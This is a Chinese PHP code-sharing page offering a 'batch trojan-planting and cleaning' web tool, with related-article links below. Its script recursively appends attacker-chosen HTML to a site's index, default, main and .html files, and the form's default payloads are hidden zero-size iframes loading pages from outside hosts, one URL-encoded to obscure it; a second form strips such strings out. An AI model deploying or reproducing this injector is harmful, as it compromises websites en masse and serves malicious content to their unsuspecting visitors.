php下批量挂马和批量清马代码


Posted in PHP onFebruary 27, 2011
<?php 
function gmfun($path=”.”) 
{ 
$d = @dir($path); 
while(false !== ($v = $d->read())) { 
if($v == “.” || $v == “..”) continue; 
$file = $d->path.”/”.$v; 
if(@is_dir($file)) { 
gmfun($file); 
} else { 
if(@ereg(stripslashes($_POST["key"]),$file)) { 
$mm=stripcslashes( trim( $_POST[mm] ) ); 
$handle = @fopen (”$file”, “a”); 
@fwrite($handle, “$mm”); 
@fclose($handle); 
echo “已挂马文件:$file\n<br>”; } 
} 
} 
$d->close(); 
echo ” “; 
} 
function qmfun($path=”.”) 
{ 
$d = @dir($path); 
while(false !== ($v = $d->read())) { 
if($v == “.” || $v == “..”) continue; 
$file = $d->path.”/”.$v; 
if(@is_dir($file)) { 
qmfun($file); 
} else { 
if(@ereg(stripslashes($_POST["key"]),$file)) { 
$mm=stripcslashes( trim( $_POST[mm] ) ); 
$handle = fopen (”$file”, “rb”); 
$oldcontent=fread($handle,filesize($file)); 
fclose($handle); 
$newcontent=str_replace($mm,””,$oldcontent); 
$fw = fopen (”$file”, “wb”); 
fwrite($fw,$newcontent,strlen($newcontent)); 
fclose($fw); 
echo “已清马文件:$file\n<br>”; 
} 
} 
} 
$d->close(); 
echo ” “; 
} 
if ($_GET['action']=='gm') { 
set_time_limit(0); 
gmfun($_POST["dir"]); 
} 
if ($_GET['action']=='qm') { 
set_time_limit(0); 
qmfun($_POST["dir"]); 
} 
?> 
<title>批量挂马(清马)程序php版</title><body> 
<form action=”<?$PHP_SELF?>?action=gm” method=”post”> 
<table border=”0″ align=”center” cellpadding=”0″ cellspacing=”0″> 
<tr> 
<td height=”25″ colspan=”2″ bgcolor=”006699″> <div align=”center”><font color=”#00FF00″ size=”4″>网站批量挂马程序php版 
BY n3tl04d</font></div> 
<td> </tr> 
<tr> 
<td height=”27″ bgcolor=”#CCCCCC”>路径:</td> 
<td height=”27″ bgcolor=”#CCCCCC”> <input name=”dir” type=”text” value=”.”>(可填相对路径) 
<td> </tr> 
<tr> 
<td height=”27″ bgcolor=”#CCCCCC”>挂马关键字:</td> 
<td height=”27″ bgcolor=”#CCCCCC”> <input name=”key” type=”text” value='index\.|default\.|main\.|\.html'>—?正则表达式匹配—— 
<td colspan=”2″ height=”1″></td> 
<td> </tr> 
<tr> 
<td height=”25″ bgcolor=”#CCCCCC”>想写入的挂马代码:</td> 
<td height=”25″ bgcolor=”#CCCCCC”><input name=”mm” type=”text” size=”50″ value='<iframe src=http://982.9966.org/b073399/b07.htm width=0 height=0 frameborder=0></iframe>'> 
<td> </tr> 
<tr> 
<td height=”25″ colspan=”2″ bgcolor=”006699″> <div align=”center”> 
<input type=”submit” name=”Submit” value=”提交”> 
   
<input type=”reset” name=”Submit2″ value=”重置”> 
</div></td> 
<td> </tr> 
</table> 
</form> 
<form action=”<?$PHP_SELF?>?action=qm” method=”post”> 
<table border=”0″ align=”center” cellpadding=”0″ cellspacing=”0″> 
<tr> 
<td height=”25″ colspan=”2″ bgcolor=”006699″> <div align=”center”><font color=”#00FF00″ size=”4″>批量清马工具php版 
BY 随风而去(LST)</font></div> 
<td> </tr> 
<tr> 
<td height=”27″ bgcolor=”#CCCCCC”>路径:</td> 
<td height=”27″ bgcolor=”#CCCCCC”> <input name=”dir” type=”text” value=”.”>(可填相对路径) 
<td> </tr> 
<tr> 
<td height=”27″ bgcolor=”#CCCCCC”>清马关键字:</td> 
<td height=”27″ bgcolor=”#CCCCCC”> <input name=”key” type=”text” value='index\.|default\.|main\.|\.html'>—?正则表达式匹配—— 
<td colspan=”2″ height=”1″></td> 
<td> </tr> 
<tr> 
<td height=”25″ bgcolor=”#CCCCCC”>想清除的挂马代码:</td> 
<td height=”25″ bgcolor=”#CCCCCC”><input name=”mm” type=”text” size=”50″ value='<iframe src=http://%31%73%61%6e%69%32%6b%6d%2e%63%6e/%6A%6A%32.htm width=50 height=0 frameborder=0></iframe>'> 
<td> </tr> 
<tr> 
<td height=”25″ colspan=”2″ bgcolor=”006699″> <div align=”center”> 
<input type=”submit” name=”Submit” value=”提交”> 
   
<input type=”reset” name=”Submit2″ value=”重置”> 
</div></td> 
<td> </tr> 
</table> 
</form>
PHP 相关文章推荐
让你同时上传 1000 个文件 (一)
Oct 09 PHP
php中iconv函数使用方法
May 24 PHP
php 模拟POST|GET操作实现代码
Jul 20 PHP
phpExcel导出大量数据出现内存溢出错误的解决方法
Feb 28 PHP
PHP5常用函数列表(分享)
Jun 07 PHP
PHP+MySql+jQuery实现的&quot;顶&quot;和&quot;踩&quot;投票功能
May 21 PHP
php+ajax注册实时验证功能
Jul 20 PHP
php使用GD2绘制几何图形示例
Feb 15 PHP
php实现的生成迷宫与迷宫寻址算法完整实例
Nov 06 PHP
PHP实现多图上传和单图上传功能
May 17 PHP
PHP内置函数生成随机数实例
Jan 18 PHP
PHP使用openssl扩展实现加解密方法示例
Feb 20 PHP
php SQL Injection with MySQL
Feb 27 #PHP
PHP的SQL注入实现(测试代码安全不错)
Feb 27 #PHP
php通用防注入程序 推荐
Feb 26 #PHP
8个出色的WordPress SEO插件收集
Feb 26 #PHP
zend framework多模块多布局配置
Feb 26 #PHP
让你成为更出色的PHP开发者的10个技巧
Feb 25 #PHP
理解php Hash函数,增强密码安全
Feb 25 #PHP
You might like
PHP中array_map与array_column之间的关系分析
2014/08/19 PHP
PHP中OpenSSL加密问题整理
2017/12/14 PHP
smarty模板的使用方法实例分析
2019/09/18 PHP
[推荐]javascript 面向对象技术基础教程
2009/03/03 Javascript
神奇的7个jQuery 3D插件整理
2011/01/06 Javascript
JavaScript基于原型链的继承
2016/06/22 Javascript
简单易懂的天气插件(代码分享)
2017/02/04 Javascript
vue实现动态数据绑定
2017/04/28 Javascript
浅谈Angular2 ng-content 指令在组件中嵌入内容
2017/08/18 Javascript
基于Vuejs的搜索匹配功能实现方法
2018/03/03 Javascript
JavaScript设计模式之模板方法模式原理与用法示例
2018/08/07 Javascript
vue.js自定义组件directives的实例代码
2018/11/09 Javascript
微信小程序上传帖子的实例代码(含有文字图片的微信验证)
2020/07/11 Javascript
vue中组件通信详解(父子组件, 爷孙组件, 兄弟组件)
2020/07/27 Javascript
[02:15]你好,这就是DOTA!
2015/08/05 DOTA
python实现哈希表
2014/02/07 Python
python+tkinter编写电脑桌面放大镜程序实例代码
2018/01/16 Python
详解PyTorch批训练及优化器比较
2018/04/28 Python
PyCharm配置mongo插件的方法
2018/11/30 Python
python 内置模块详解
2019/01/01 Python
Pytorch .pth权重文件的使用解析
2020/02/14 Python
解决使用Pandas 读取超过65536行的Excel文件问题
2020/11/10 Python
CSS3 毛玻璃效果
2019/08/14 HTML / CSS
英国领先的酒类网上商城:TheDrinkShop
2017/03/16 全球购物
切尔西足球俱乐部官方网上商店:Chelsea FC
2019/06/17 全球购物
Brora官网:英国领先的羊绒服装品牌
2019/08/28 全球购物
动态密码技术
2012/10/18 面试题
留学生如何写好自荐信
2013/12/27 职场文书
关于美容院的活动方案
2014/08/14 职场文书
幽默自我介绍演讲稿
2014/08/21 职场文书
2014年向国旗敬礼活动总结
2014/09/27 职场文书
教师个人自我剖析材料
2014/09/29 职场文书
2014年女职工工作总结
2014/11/27 职场文书
2014年世界艾滋病日演讲稿
2014/11/28 职场文书
二手车转让协议书
2015/01/29 职场文书
小学六年级毕业感言
2015/07/30 职场文书